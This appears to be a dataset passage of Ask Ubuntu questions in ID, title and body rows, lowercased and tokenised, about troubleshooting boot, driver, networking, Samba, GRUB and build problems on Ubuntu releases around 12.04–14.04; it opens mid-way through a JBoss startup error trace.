org.jboss.modules.main.main ( main.java:275 ) caused by : java.io.filenotfoundexception : /usr/share/jboss-as-7.1.1.final/standa lone/log/boot.log ( no such file or directory ) at java.io.fileoutputstream.open ( native method ) at java.io.fileoutputstream. < init > ( fileoutputstream.java:194 ) at org.jboss.logmanager.handlers.filehandler.setfile ( filehandler.java:15 2 ) at org.jboss.logmanager.handlers.filehandler.setfilename ( filehandler.jav a:183 ) ... 22 more 17:12:02,635 info [ org.jboss.modules ] jboss modules version 1.1.1.ga java.lang.illegalstateexception : jbas018704 : could not create server data direct ory : /usr/share/jboss-as-7.1.1.final/standalone/data at org.jboss.as.server.serverenvironment. < init > ( serverenvironment.java:3 88 ) at org.jboss.as.server.main.determineenvironment ( main.java:242 ) at org.jboss.as.server.main.main ( main.java:83 ) at sun.reflect.nativemethodaccessorimpl.invoke0 ( native method ) at sun.reflect.nativemethodaccessorimpl.invoke ( nativemethodaccessorimpl . java:39 ) at sun.reflect.delegatingmethodaccessorimpl.invoke ( delegatingmethodacces sorimpl.java:25 ) at java.lang.reflect.method.invoke ( method.java:597 ) at org.jboss.modules.module.run ( module.java:260 ) at org.jboss.modules.main.main ( main.java:291 ) vagrant @ precise32 : /usr/share/jboss-as-7.1.1.final/bin $
455342	boot problem - can not install edubuntu	i have an old toshiba laptop i 'd like to put edubuntu on . i first made a dban disc to wipe the drive . it was burned with imgbrn software and booted fine . i also made an edubuntu disc in the same manner , but it will not boot . the disc image file is from the edubuntu website . i then formatted a flash drive to make it bootable and used the universal usb installer at pendrivelinux.com to put edubuntu on the flash drive . the boot menu on the bios is set to 1 ) cd/dvd 2 ) removable media , 3 ) hard drive , 4 ) network . when the computer starts , it recognizes the flash drive , but when it cycles through the boot process , it gets to the last in the list as evidenced by the pxe error that eventually comes up when it ca n't find a network connection . i know the computer can boot from disc as it booted the dban disc when i wiped the hard drive . i do n't know why it will not boot edubuntu either from disc or from a flash drive . this is my first experience with any linux-based os . am i missing something ?
455343	tlp governor settings not taking effect	i have tlp installed with these config lines : cpu_scaling_governor_on_ac=powersave cpu_scaling_governor_on_bat=powersave but my governors are still ondemand . i know how to do it with cpufrequtils as mentioned in how to permanently set cpu power management to the powersave governor ? , but why is the tlp settings not taking effect ? i dont have cpufrequtils installed . but i do have cpupower . but does that matter ?
455344	fan problem with ubuntu	here is some of the problem that i have . when i use ubuntu 14.04 my fan works very fast ( on pc ) i do n't have this problem on win after install vga driver i use amd hd radeon 5 ... is it okay to use ubuntu with windows ? amd released a v. of driver for ubuntu but its for 32 bit linux and i use 64 bit version ? can i install it ? ubuntu detected my driver but i cant use high resolution ( 1280 on windows ) and there is just 1024 ? if i transfer data from a pc that have virus like autorun.inf with ubuntu then i go to windows am i infected to the virus ?
455345	i want to use fstate to measure context switch activity , but tracer 'sched_switch ' is missing from my list of fstate tracers . can i fix that somehow ?	# uname -a linux utah 3.5.0-17-generic # 28-ubuntu smp tue oct 9 19:31:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux # cat /sys/kernel/debug/tracing/available_tracers blk function_graph mmiotrace wakeup_rt wakeup function nop as you can see above , there is no sched_switch . how can i debug context switching ? i am having the problem described here : http : //stackoverflow.com/questions/14037070/why-one-non-voluntary-context-switch-per-second/14127912 # 14127912
455347	executable on ubuntu 14.04	i 'm running ubuntu 14.04. how can i open an executable ? i 've already tried to follow the instructions on other posts about the same subject , although they 're all about previous versions of ubuntu , and the instructions are too complex or me anyway . i know nothing about ubuntu , because i am new to it . could you please explain it to me , plain and simple , how to execute a file ? thank you !
455352	how to move window buttons to right side in 14.04 gnome fallback	ubuntu tweak does n't seem to give me this capability , i can change theme stuff but those buttons are fixed on the left side
455354	how can be printer available on kubuntu	i am using kubuntu . i want to connect my brother dcp 6690cw printer . but no printer driver listed to add my printer . how do i connect to printer to kubuntu ? could anyone help ?
455357	ssh-copy-id ubuntu : permission denied after deleting .ssh	few weeks ago i generated my ssh keys , registered my public key to the server etc etc . everything went perfect . now i wanted to generate an other couple of ssh keys on another machine ( on ubuntu ) and do the same things : same user , different keys . the first time i tried everything went , more or less , right , but later , i had some issues , so i had the genius idea of deleting the .ssh folder and all the relative keys inside and restarting everything from scratch . the result is that now i am not even able to register the new keys on the server and i do not know what to try anymore ! $ ssh-copy-id -i ~/.ssh/id_rsa.pub username @ server.example.com asks me for my passphrase , which does n't recognize , terminating with something like permission denied ( publickey , gssapi-keyex , gssapi-with-mic ) thank you in advance ! !
455358	how do i rollback recent updates ? 50+ crash reports upon login	am running 13.10 w/cinnamon , but still have unity installed . everything was working fine until i responded to an update manager update notification . i tried rebooting into a prior kernel version , but that did n't fix this . i also tried changing session to unity , but also same issues . the behavior after login is crash reports for 50+ applications , none of which are in startup applications . here 's what got updated : start-date : 2014-04-25 10:17:35 commandline : aptdaemon role='role-commit-packages ' sender=':1.75' install : linux-image-extra-3.11.0-20-generic : amd64 ( 3.11.0-20.34 ) , linux-image-3.11.0-20-generic : amd64 ( 3.11.0-20.34 ) , linux-headers-3.11.0-20 : amd64 ( 3.11.0-20.34 ) , linux-headers-3.11.0-20-generic : amd64 ( 3.11.0-20.34 ) upgrade : linux-headers-generic : amd64 ( 3.11.0.19.20 , 3.11.0.20.21 ) , google-chrome-stable : amd64 ( 34.0.1847.116-1 , 34.0.1847.132-1 ) , pepflashplugin-installer : amd64 ( 13.0.0.182~cr34.0.1847.116-1-0skunk0 , 13.0.0.206~cr34.0.1847.132-1-0skunk0 ) , chromium-codecs-ffmpeg-extra : amd64 ( 33.0.1750.152-0ubuntu0.13.10.1~pkg984.1 , 34.0.1847.116-0ubuntu~1.13.10.0~pkg991 ) , linux-libc-dev : amd64 ( 3.11.0-19.33 , 3.11.0-20.34 ) , linux-image-generic : amd64 ( 3.11.0.19.20 , 3.11.0.20.21 ) , linux-generic : amd64 ( 3.11.0.19.20 , 3.11.0.20.21 ) end-date : 2014-04-25 10:20:19 if i wanted to rollback to prior to this update , and have the earlier versions of the various , what is the best way to handle ?
455359	skype and dropbox installation problems and nvidia problems	hi guys i recently installed the new lts of ubuntu ( 14.04 ) and i am having problems installing skype and dropbox . i am downloading the files from the official website . also it seems that the this release of ubuntu is recognizing my nvidia card however it downloads drives for the previous model of my laptop but i still have problems while watching youtube videos and movies .
455360	how to turn off cryptswap ?	i selected startup encryption during installation of 14.04 . should i reinstall ubuntu or is there an easier way to turn off the startup encryption ?
455362	13.10 samba installed . can not find it revisited	ok trying again , and putting a different way.. *i have installed 13.10 *i would like to enable personal file sharing *the 'share files over the network ' section is greyed out and says `` this feature can not be enabled because the required packages are not installed on your system '' . i believe that is a reference to nautilus or samba or both . both of these are installed but i still can not enable personal file sharing *when i look in the software centre it says samba is installed , but when i look through the applications menus , i can not find it anywhere . i have gone to the main menu and enabled absolutely everything , yet i still can not open samba to configure it . questions : *why can not i not find samba in the applications list ? i can on my older ubuntu version ( 12 something ) on my pc *is there something else i need to install to make personal file sharing work ? thanks
455363	dell d631 + secondary battery ca n't boot- 14.04 x64	i have a secondary battery in the cd/dvd bay on a dell d631 . with battery installed ubuntu 14.04 64bit wo n't boot , stalls at `` trying to unpack rootfs image as initramfs '' . without secondary battery , it boots fine . i can add battery once booted and it detects it and shows charging / power levels.but once turned off will not boot again till battery is removed and cd / dvd drive replaced . it used to boot fine on ubuntu 13.10 32bit
455364	how do you connect to a network that is broadcasting but does not have an ssid ?	i have access to the mac address and signal strength . he 's not jamming my network , but he is bridging my wireless network . i want to connect to his network and figure out what he 's doing . any advice or resources will be appreciated .
455365	boot ( possibly mbr ) messed up after updating from 12.04 to 14.04	now , before you tell me to use the search function for this ( common ) issue - i did work an this for the last 5 hours and i am getting to no ( close ) solution . this is the exact problem : after updating my 12.04 to 14.04 yesterday booting ended up in the grub rescue prompt . so i did what i did often before when facing boot problems ( and it worked every time until yesterday ! ) : i got a live usb-device installed and ran boot-repair but this time this made it worse : my bios is now not even recognizing the hard-drive ( sata ) as bootable . running boot-repair a few times more with different settings did not help . then i searched all the forums and wikis on how to install grub manually and what i found was this : boot into a live system mount the 'broken ' system , especially the /sys , /proc and /dev directories chroot into this system ( re- ) install the correct grub-package ( which is grub-efi-amd64 for me ) run update-grub exit the chroot reboot but this still leaves me with my hard-drive not beeing recognized ( and as a result with a `` operating system not found '' error ) . the partitioning is the following : /dev/sd ? /dev/sd ? 1 : 94mb , flags : boot , fat16 /dev/sd ? 2 : 2gb , linux-swap /dev/sd ? 3 : ~260gb , ext4 , the rest of the ubuntu 14.04 as of my naive view , i always thought this is the way it works : my bios sees the hard-drive and the partition with the boot flag the bios ( whether efi or legacy does not matter to me , it has to work ) launches grub there grub loads the linux-kernel from the third partition i insist on the separate boot-partition because - as i said - this is not the first time for me to experience big issues with grub . the separate partition made solving it easier for me . i 'll - of course - provide any information neccessary . thanks in advance !
455367	file location on ubuntu 14.04	i 'm running ubuntu 14.04 . i 'd like to know where do the files of a certain installed program go . in windows , for example , you go to the c : \programe files\name of the specific program folder . how do you find these files in ubuntu ?
455369	how do i install retrospect backup client on 14.04 ?	retrospect backup client require 32-bit libraries . on the 12.04 lts i would install ia32-libs . that is no longer an available package and it appears that i must determine more precisely what libraries are needed for this closed-source app . the vendor does n't support ubuntu , just redhat .
455370	how to enable 3d cover flow for windows in ubuntu 14.04 ?	i would like to know how can i enable 3d cover flip in ubuntu to switch between opened windows .
455371	probleme with ppa and ubuntu distro	i use ubuntu 14.04 64bit . i 'd like to install the following applications : final term ledger but i ca n't , because , after having installed the corresponding ppa for ledger and final term , i do sudo apt-get update and i get the following messages : w : impossible de récupérer http : //ppa.launchpad.net/finalterm/daily/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : impossible de récupérer http : //ppa.launchpad.net/finalterm/daily/ubuntu/dists/trusty/main/binary-i386/packages 404 not found w : impossible de récupérer http : //ppa.launchpad.net/mbudde/ledger/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : impossible de récupérer http : //ppa.launchpad.net/mbudde/ledger/ubuntu/dists/trusty/main/binary-i386/packages 404 not found i could be wrong , but it seems that ubuntu looks for packages in places that do n't exist , beacuse both ppa mention saucy as the last distro , and i use trusty . is this related ? is there a way to install these apps ? * *without building them , i prefer automatic updates thanks
455375	update manger on ubuntu 12.04	requires installation of untrusted packages this state appear when do update http : //i.imgur.com/sft0efi.png
455376	multiline r commands disappear in command line	i generally use r from the command line . however , this problem has been annoying me . when i use the up arrow to get a previous command , if that command was multiple lines , then r only shows the last line ( although if i execute the command , it executes the whole thing ) . any ideas about what setting i need to change to make this work as expected ?
455379	is ubuntu 12.04 works fine on lenovo g400 i3 ?	i 'm planning to buy new laptop ( lenovo g400 ) , but i want to be sure i can run ubuntu 12.04 on it . thank you
455380	sharing a drive that shows up under /media	when i installed ubuntu 14.04 i made a fresh install on a new drive . the old drive became my data drive and shows up under /media . i have tried unsuccessfully to share this second drive on my in-house local network . it appears all the samba settings are correct and work for the main drive , but not the drive that installs under the /media folder as a device . i have given adm privileges to the ownership . the drive shows as a shared drive in all the settings , it 's correct in the smb.comf file but still can not be accessed . i get the message unable to access location . failed to mount windows share : permission denied . yet permissions were established in the share . can anyone help figure this out ?
455387	how to make a chmod change permanent	i 've recently had to install a brother printer on a pc with ubuntu 12.04 . to make the scanner work , iâve had to put this line in terminal : sudo chmod o+wr /dev/bus/usb/00*/* i found this in a forum . what the problem is , is that when i restart my computer that effect just disappears and i have to put it again in terminal . is there any way to make that permissions change permanent ? thank you so much .
455389	how to share a virtualbox virtual machine with users of the computer	i have a computer with ubuntu 14.04 , with several user accounts . in one of those accounts , i have a virtual machine in virtualbox . i would like to share that virtual machine with the other users of the computer . how can i do it ?
455393	after clean install of 14.04 there are no nvidia drivers available	i performed a clean install of 14.04lts 64bit on a brand new intel 730 ssd . the install went ok , but i was not aware that the ubuntu devs decided to install ( without any warning ) the open source nouveau video driver instead of the proprietary nvidia driver ( as they have in past lts releases ) . once i realized this , i went to the software updates `` additional drivers '' tab to install the nvidia 331.xx driver for my pny 750ti card . the driver search came back totally empty -- no nvidia drivers listed at all ! no message explaining what was going on either , just an empty box . i tried changing the mirror from the main ubuntu us mirror to the columbia university , nyc mirror and got the same result . i also tried to install the nvidia driver via synaptic package manager and on a reboot i could not login because no lighdm login screen appeared . i gave up and went back to 12.04.4 lts . i hope the ubuntu devs have a good explanation for this new and unwelcome behavior . is there an way to install 14.04lts/64 and get the nvidia driver installed from the beginning ? if so , how ?
455394	ca n't get nic cards working	i had a linux server with a intel s2400sc motherboard . the motherboard took a dump and so i ordered the same board again and replaced . everything works fine except now , i ca n't get network up . it 's the exact same configuration and the exact same hardware . my /etc/network/interfaces is the same , has n't changed . when i do a ifconfig , it does n't show any eth 's . when i do a ifconfig eth0 up i get no such device . i am too new to linux to solve this on my own , would someone be willing to list the steps for me ? dying over here !
455397	gnuradio leaving directory error	i 'm installing gnuradio 3.4.2 on ubuntu 12.04 lts - 64bit . after `` ./configure '' . i get : ********************************************************************* the following components were skipped either because you asked not to build them or they did n't pass configuration checks : usrp2-firmware these components will not be built . ********************************************************************* the following gnu radio components have been successfully configured : config gruel volk gnuradio-core usrp usrp2 gr-usrp gr-usrp2 gr-msdd6000 gr-audio gr-atsc gr-cvsd-vocoder gr-gpio gr-gsm-fr-vocoder gr-noaa gr-pager gr-radar-mono gr-radio-astronomy gr-trellis gr-video-sdl gr-wxgui gr-qtgui gr-sounder gr-utils gnuradio-examples grc docs you my now run the make command to build these components . ********************************************************************* the following components were skipped either because you asked not to build them or they did n't pass configuration checks : gcell gr-gcell gr-comedi gr-uhd gr-shd these components will not be built . configured gnu radio release 3.4.2 for build . after running `` make '' , i 'm getting this in the end : linux-gnu/crtn.o -pthread -pthread -pthread -wl , -soname -wl , libgnuradio-qtgui-3.4.2.so.0 -o .libs/libgnuradio-qtgui-3.4.2.so.0.0.0 /usr/bin/ld : can not find -laudio /usr/bin/ld : can not find -lxi collect2 : ld returned 1 exit status make [ 5 ] : *** [ libgnuradio-qtgui.la ] error 1 make [ 5 ] : leaving directory `/home/akula/openbts/gnuradio-3.4.2/gr-qtgui/lib' make [ 4 ] : *** [ all ] error 2 make [ 4 ] : leaving directory `/home/akula/openbts/gnuradio-3.4.2/gr-qtgui/lib' make [ 3 ] : *** [ all-recursive ] error 1 make [ 3 ] : leaving directory `/home/akula/openbts/gnuradio-3.4.2/gr-qtgui' make [ 2 ] : *** [ all ] error 2 make [ 2 ] : leaving directory `/home/akula/openbts/gnuradio-3.4.2/gr-qtgui' make [ 1 ] : *** [ all-recursive ] error 1 make [ 1 ] : leaving directory `/home/akula/openbts/gnuradio-3.4.2' make : *** [ all ] error 2 i try to install couple more versions but with same result . can anyone help me ? thanks .
455398	amd radeon hd 6850m driver compatability	i 'm hopeless . i 'm also dramatic . i 've read a couple articles/posts about this issue but i have no idea what i 'm doing and do n't know how to install drivers . does anyone know how to download a driver that will best utilize my amd radeon hd 6850m graphics card ? also , is this issue related to unity freezing after opening my laptop from suspend/during lightdm/randomly ? ah . i 'm running an acer aspire 7750g
455410	computer modern with chrome	when using chrome , i 'd like to enable the computer modern roman to be displayed when i view math in , for example , physics.stackexchange or other sites that use mathjax . is there a simple way to do this ? currently , my browswer displays such math in another font that i do n't recognize .
455412	unable to mount/access phone after upgrade to ubuntu 14.04	a nokia lumia 920 will not mount in 14.04 . when i was running 13.10 this was n't an issue . what should i try ? or will i have to revert to 13.10 ? what mtp-detect shows : kjhg @ kjhg-lifebook-ah530-hd6 : ~ $ mtp-detect unable to open ~/.mtpz-data for reading , mtpz disabled.libmtp version : 1.1.6 listing raw device ( s ) device 0 ( vid=0421 and pid=0661 ) is a nokia nokia lumia wp8 . found 1 device ( s ) : nokia : nokia lumia wp8 ( 0421:0661 ) @ bus 2 , dev 4 attempting to connect device ( s ) ptp_error_io : failed to open session , trying again after resetting usb interface libmtp libusb : attempt to reset device libmtp panic : failed to open session on second attempt unable to open raw device 0 ok .
455416	14.04 . unity gone . tried everything in the forums . nothing will bring it back	i tried enabling the cube desktop in compiz and unity vanished . no reboots will bring it back . i tried reinstalling ubuntu desktop and that did nothing . i tried resetting compiz to defaults and enabling the unity plugin and that did nothing either . i 've basically tried everything in every answer and they have n't done a thing . so let me know what information i need to give you and i 'll type it out here . this happened ten minutes after updating from 12.04-14.04 . i do get an error `` plugin opengl not loaded . ''
455418	samba started twice on boot up after upgrade to 14.04	the second attempt results in a failure : starting smb/cifs file and active directory server [ 74g [ [ 31mfail [ 39 ; 49m ] i 'd like to figure out where the second attempt is coming from and remove it . bootl.log : * stopping read required files in advance [ 74g [ ok ] * starting mount filesystems on boot [ 74g [ ok ] * starting populate and link to /run filesystem [ 74g [ ok ] * stopping populate and link to /run filesystem [ 74g [ ok ] * stopping track if upstart is running in a container [ 74g [ ok ] * starting initialize or finalize resolvconf [ 74g [ ok ] * starting signal sysvinit that virtual filesystems are mounted [ 74g [ ok ] * starting signal sysvinit that virtual filesystems are mounted [ 74g [ ok ] * starting bridge udev events into upstart [ 74g [ ok ] * starting signal sysvinit that remote filesystems are mounted [ 74g [ ok ] * starting device node and kernel event manager [ 74g [ ok ] * starting load modules from /etc/modules [ 74g [ ok ] * starting cold plug devices [ 74g [ ok ] * starting log initial device creation [ 74g [ ok ] * stopping load modules from /etc/modules [ 74g [ ok ] * starting uncomplicated firewall [ 74g [ ok ] * starting configure network device security [ 74g [ ok ] * starting configure network device [ 74g [ ok ] * starting signal sysvinit that the rootfs is mounted [ 74g [ ok ] * starting configure network device security [ 74g [ ok ] * starting mount network filesystems [ 74g [ ok ] * stopping mount network filesystems [ 74g [ ok ] * starting bridge socket events into upstart [ 74g [ ok ] * starting clean /tmp directory [ 74g [ ok ] * starting configure network device [ 74g [ ok ] * starting userspace bootsplash [ 74g [ ok ] * starting send an event to indicate plymouth is up [ 74g [ ok ] * stopping send an event to indicate plymouth is up [ 74g [ ok ] * stopping userspace bootsplash [ 74g [ ok ] * stopping clean /tmp directory [ 74g [ ok ] * starting smb/cifs file server [ 74g [ ok ] * starting signal sysvinit that local filesystems are mounted [ 74g [ ok ] * stopping mount filesystems on boot [ 74g [ ok ] * starting flush boot log to disk [ 74g [ ok ] * starting flush early job output to logs [ 74g [ ok ] * stopping failsafe boot delay [ 74g [ ok ] * starting enabling additional executable binary formats [ 74g [ ok ] * starting system v initialisation compatibility [ 74g [ ok ] * stopping flush boot log to disk [ 74g [ ok ] * stopping cold plug devices [ 74g [ ok ] * starting d-bus system message bus [ 74g [ ok ] * stopping flush early job output to logs [ 74g [ ok ] * stopping log initial device creation [ 74g [ ok ] * starting configure network device security [ 74g [ ok ] * starting modem connection manager [ 74g [ ok ] * starting configure network device security [ 74g [ ok ] * starting save udev log and update rules [ 74g [ ok ] * starting bluetooth daemon [ 74g [ ok ] * stopping save udev log and update rules [ 74g [ ok ] * starting configure virtual network devices [ 74g [ ok ] * starting bridge file events into upstart [ 74g [ ok ] * starting system logging daemon [ 74g [ ok ] skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd * starting systemd login management service [ 74g [ ok ] * starting apparmor profiles [ 100g [ 94g [ ok ] * setting up x socket directories ... [ 100g [ 94g [ ok ] * stopping system v initialisation compatibility [ 74g [ ok ] * starting system v runlevel compatibility [ 74g [ ok ] * starting save kernel messages [ 74g [ ok ] * starting anac ( h ) ronistic cron [ 74g [ ok ] * starting regular background program processing daemon [ 74g [ ok ] * starting deferred execution scheduler [ 74g [ ok ] * starting cpu interrupts balancing daemon [ 74g [ ok ] * stopping save kernel messages [ 74g [ ok ] * starting automatic crash report generation [ 74g [ ok ] * starting network connection manager [ 74g [ ok ] * stopping crash report submission daemon [ 74g [ ok ] * stopping restore sound card state [ 74g [ ok ] * stopping anac ( h ) ronistic cron [ 74g [ ok ] * starting smb/cifs file and active directory server [ 74g [ ok ] * starting acpi daemon [ 74g [ ok ] * starting smb/cifs file and active directory server [ 74g [ [ 31mfail [ 39 ; 49m ] sudo initctl list mountnfs-bootclean.sh start/running nmbd start/running , process 1243 rsyslog start/running , process 685 tty4 start/running , process 788 udev start/running , process 268 upstart-udev-bridge start/running , process 262 vmware-tools start/running mountall-net stop/waiting passwd stop/waiting rc stop/waiting startpar-bridge stop/waiting ureadahead-other stop/waiting whoopsie stop/waiting apport start/running smbd start/running , process 517 systemd-logind start/running , process 750 tty5 start/running , process 793 console-setup stop/waiting gpu-manager stop/waiting hwclock-save stop/waiting irqbalance stop/waiting plymouth-log stop/waiting mountall.sh start/running failsafe stop/waiting rfkill-store stop/waiting atd start/running , process 845 dbus start/running , process 559 resolvconf start/running failsafe-x stop/waiting mounted-var stop/waiting plymouth-shutdown stop/waiting plymouth stop/waiting udev-fallback-graphics stop/waiting usb-modeswitch-upstart stop/waiting checkroot.sh start/running network-manager start/running , process 869 control-alt-delete stop/waiting hwclock stop/waiting mounted-proc stop/waiting alsa-store stop/waiting setvtrgb stop/waiting shutdown stop/waiting vmware-tools-thinprint stop/waiting cron start/running , process 846 lightdm start/running , process 923 mountkernfs.sh start/running alsa-restore stop/waiting mountall stop/waiting mounted-debugfs stop/waiting binfmt-support start/running console stop/waiting mounted-run stop/waiting acpid start/running , process 984 bluetooth start/running , process 586 checkfs.sh start/running checkroot-bootclean.sh start/running mountnfs.sh start/running ufw start/running kmod stop/waiting plymouth-stop stop/waiting rcs stop/waiting reload-smbd stop/waiting wait-for-state stop/waiting bootmisc.sh start/running flush-early-job-log stop/waiting friendly-recovery stop/waiting rc-sysinit stop/waiting samba-ad-dc stop/waiting upstart-socket-bridge start/running , process 395 pulseaudio stop/waiting mountdevsubfs.sh start/running tty2 start/running , process 799 upstart-file-bridge start/running , process 679 anacron stop/waiting udevtrigger stop/waiting mtab.sh start/running tty3 start/running , process 800 container-detect stop/waiting mounted-dev stop/waiting udev-finish stop/waiting alsa-state stop/waiting hostname stop/waiting mountall-reboot stop/waiting network-interface ( lo ) start/running network-interface ( eth0 ) start/running tty1 start/running , process 1702 mountall-shell stop/waiting mounted-tmp stop/waiting plymouth-ready stop/waiting plymouth-splash stop/waiting plymouth-upstart-bridge stop/waiting udevmonitor stop/waiting mountall-bootclean.sh start/running network-interface-security ( network-manager ) start/running network-interface-security ( network-interface/eth0 ) start/running network-interface-security ( network-interface/lo ) start/running network-interface-security ( networking ) start/running networking start/running tty6 start/running , process 803 dmesg stop/waiting procps stop/waiting rfkill-restore stop/waiting console-font stop/waiting network-interface-container stop/waiting ureadahead stop/waiting
455422	failed building package on ubuntu 12.04 lts	i 'm trying to install dashcast but i got the errors : /usr/bin/ld.bfd.real : /usr/local/lib/libx264.a ( opencl.o ) : undefined reference to symbol 'dlopen @ @ glibc_2.1' /usr/bin/ld.bfd.real : note : 'dlopen @ @ glibc_2.1 ' is defined in dso /usr/lib/gcc/i686-linux-gnu/4.6/../../../i386-linux-gnu/libdl.so so try adding it to the linker command line /usr/lib/gcc/i686-linux-gnu/4.6/../../../i386-linux-gnu/libdl.so : could not read symbols : invalid operation collect2 : ld returned 1 exit status make [ 2 ] : *** [ dashcast ] error 1 make [ 2 ] : leaving directory `/tmp/gpac/applications/dashcast' make [ 1 ] : *** [ apps ] error 2 make [ 1 ] : leaving directory `/tmp/gpac/applications' make : *** [ all ] error 2 i do n't understand try adding it to the linker command line what should i do from here ?
455426	partitions for installing ubuntu beside windows	i know that for installing ubuntu we need a boot drive ( / ) and home ( /home ) and ( /swap ) but i do n't know what is swap and home now if i install ubuntu beside windows without any home and swap drive is it okay ? can i work correctly with ubuntu ?
455438	help or advice about multiuser ubunu for small net work vs ubuntu on their old xp machines	i support a small non-profit who is using windows xp for desktop and a linux server for a gateway server . i am looking a ways to help them move their technology needs forward without a big budget . i am interested in the possibility of setting them up with a multi-user machine so there dated computers now running windows xp can be used for thin client access to one nice machine . also they need a real solution to being able to use/collaborate with users of microsoft office products especially access database . libra office is fine for many of there needs but they have had some of the government agencies they work with demanding they use the latest ms office to collaborate with them . i read in some of the ubuntu documentation that a multi-user ubuntu server could allow them access to a windows server running ms office they could all share one license . is there anyone willing to help me with this as the normal ubuntu business folks said were to small to mess with and try asking for some help here . thanks
455439	nvidia-settings crash while on intel graphics	i 've added the xorg-edgers ppa using sudo add-apt-repository ppa : xorg-edgers/ppa . then i 've tried different packages , all with the same problem . i 'm currently using nvidia-331 as it 's working almost perfectly . the only problem that 's left is that nvidia-settings is working perfectly when i 'm using nvidia graphics , but as soon as i switch to intel graphics ( i 'm on a notebook with nvidia optimus ) nvidia-settings wo n't open ( it crashes instantly ) . executing nvidia-settings in the terminal only gives me : ** message : prime : requires offloading ** message : prime : is it supported ? yes segmentation fault ( core dumped ) i used the following commands to install nvidia-331 : sudo add-apt-repository ppa : xorg-edgers/ppa sudo apt-get update sudo apt-get -- purge remove nvidia* sudo apt-get -- purge autoremove sudo apt-get install nvidia-331 sudo apt-get upgrade sudo apt-get dist-upgrade i ca n't use the nvidia drivers in ubuntu 's repository as the performance is horrible on my notebook . however , nvidia-settings never had those problems using ubuntu 's repository . update : seems to be a bug ( lp # 1214508 ) . however , they claim all packages > = 319 are affected , but it was working just fine using nvidia-331 from ubuntu 's repository .
455440	guest on kvm wont detect disk even after seleting virtio drivers	recently update to ubuntu 14.04 , and now using kvm but hit a wall . i 'm trying to install a win8.1 64 bits virtual machine . i follow this tutorial , https : //www.youtube.com/watch ? v=fmxctyhcrfs , but got an error when trying to configure the hard disk , i select the virtio drivers but nothing happened , it just says there no device . could someone point help me troubleshoot this ? using , ubuntu 14.04 , amd64 .
455441	shutting down the system : it shuts down but reboots on its own	shutting down the system via the menu or via sudo shutdown -h now seems to power the system down , but restarts the computer after a few seconds . ubuntu 14.04 . unity . using full disk encryption .
455443	how to open several image files from command line , consecutively , for editing ?	lets say i have three image files to edit . consider all the files are in ~/pictures . let name of the first file be 1.svg , name of the second file be 2.svg and name of the third file be 3.svg .i have inkscape editor . now , i want a bash script to be executed so that the following must happen : first 1.svg must open for me to edit . after editing , when i close that file , automatically 2.svg must open for me to edit . now when i complete editing 2.svg , i want 3.svg to open for editing . now after editing 3.svg the script must end by closing gimp . ps : - if you are wondering if this is home work , it is not ! see here . you will notice that i have to edit images there . to make that answer better i need help here . so please help . also i am a complete beginner . i do n't know anything about bash . so explain your answer as elaborately as possible . also you might consider giving an answer with gimp editor to edit .jpg files . it might be useful for others . by the way , i am using 14.04 lts . thanks in advance . update : - the above linked answer was edited according to the accepted answer below .
455444	words with underline in commands man page	there is some words in man pages for most commands that i have seen . what is the meaning of this underline ? is that link ? if yes how we can go there ?
455447	command line app to burn part of a long .wav to audio cd	i have a 7-hour wav file ( recording of rain sounds ) , and i 'd like to burn a cd from it . how can i burn as much as it as will fit onto a standard audio cd so that it will play continuously for the 50mins or so that a cd usually plays for on my ancient cd player ? i 'd prefer to be able to do this from the command line .
455449	grub does n't load windows after ubuntu 14.04 upgrade	i upgraded to ubuntu 14.04 . today i wanted to play a game on windows but if i choose windows 7 from the grub menu , the menu disappears and nothing else happenes . so i tried several things like run boot-repair . any suggestions ?
455457	disable menu items access with keyboard shortcuts	i 've recently upgraded to ubuntu 14.04 and i 'm facing some issues . when i press alt + another key it opens the top menu bar to the corresponding menu ( for example , if i press alt+f then it opens the file menu ) . i do n't want this feature since i use the alt key for other functions in some programs . i there a way to disable this ? i 've tried compiz config , keyboard shortcuts parameters , etc , and nothing seems to be related to that .
455463	ubuntu 14.04 - install now button disabled	unable to install ubunto 14.04 alongside windows xp because the `` install now '' button ( and the back button ) are disabled on the partitioning screen . any suggestions on how to proceed are appreciated .
455465	i need help finding my usb connected devices	how do i get the usb device connected to my computer to show my connected devices if i am running a virtual version of ubuntu 14.04 . i am using vmware and i have no clue how to get it to work.what should i do ?
455466	light locker will not load when i click on it	i keep getting a blank screen and lose my spotify stream after about 10 to 15 minutes . the problem i am having is with light locker . in my case i can not get light locker settings to open at all . i wanted to disable this feature as it keeps interrupting my music stream . i am brand new to linux . i have an asus eee901 netbook , with 2 gb of ram , 128 ssd with xubuntu 32 bit installed on it . i use a netbook for web browsing and i use google chrome and streaming spotify , and that is about it . also , would lubuntu allow me to use spotify to stream ? thanks in advance ...
455473	custom resolutions for games	i have created a custom resolution ( 1840x1000 ) to be used with my hdtv to combat overscan . my tv is a technika x22/14a and does not have a setting to turn off overscan . i am building a gaming pc that will be based around the fx6300 cpu and a gtx 660 gpu . does anyone know if using this custom resolution will affect how games run as i have n't decided on ubuntu or windows 8 as an os . i know how to solve overscan issues in windows 8 but i would prefer to give ubuntu a go and not fork out âł85 to microsoft !
455476	ubuntu 14.04 setup for canoscan 9000 mark ii	how do i get sane to work on ubuntu 14.04 with a usb 3 connected canoscan 9000f mark ii scanner lsusb shows the device as a canon device 0x04a9/0x190d . i added this device to /etc/sane.d/canon-dr.conf scanimage -d test -t works with all passes sudo scanimage -l fails to find the device sudo sane-find-scanner fails to find the device sudo scanimage -d sane-canon_dr -t says this is an invalid device
455477	click to minimize inconsistent in xubuntu 14.04	i have a panel with a the list of windows . for some programs , clicking on their window button on the panel minimizes the window . ( firefox acts this way ) . others , clicking does nothing . how do i make it to that the are consistent ? ( i 'd prefer the click minimizes the window , but could get by without that . but having different results for different windows is driving me nuts )
455478	what is 'setcap ' command and 'file capability ' ?	what is the setcapcommand and what is file capability , also the meaning of below `` setcap output : cap_net_raw+eip cap_net_admin+eip `` /usr/bin/dumpcap '' running wireshark - `` lua : error during loading ''
455480	how i can know the uptime on battery	is there a way i can know how much time the laptop is up on battery , i know there is the uptime -but it tell how long the system has been running both on ac and battery
455482	no listen icon in chromium	when i use define : word in google or using google translate , there 's suddenly no listen icon . what did happen ?
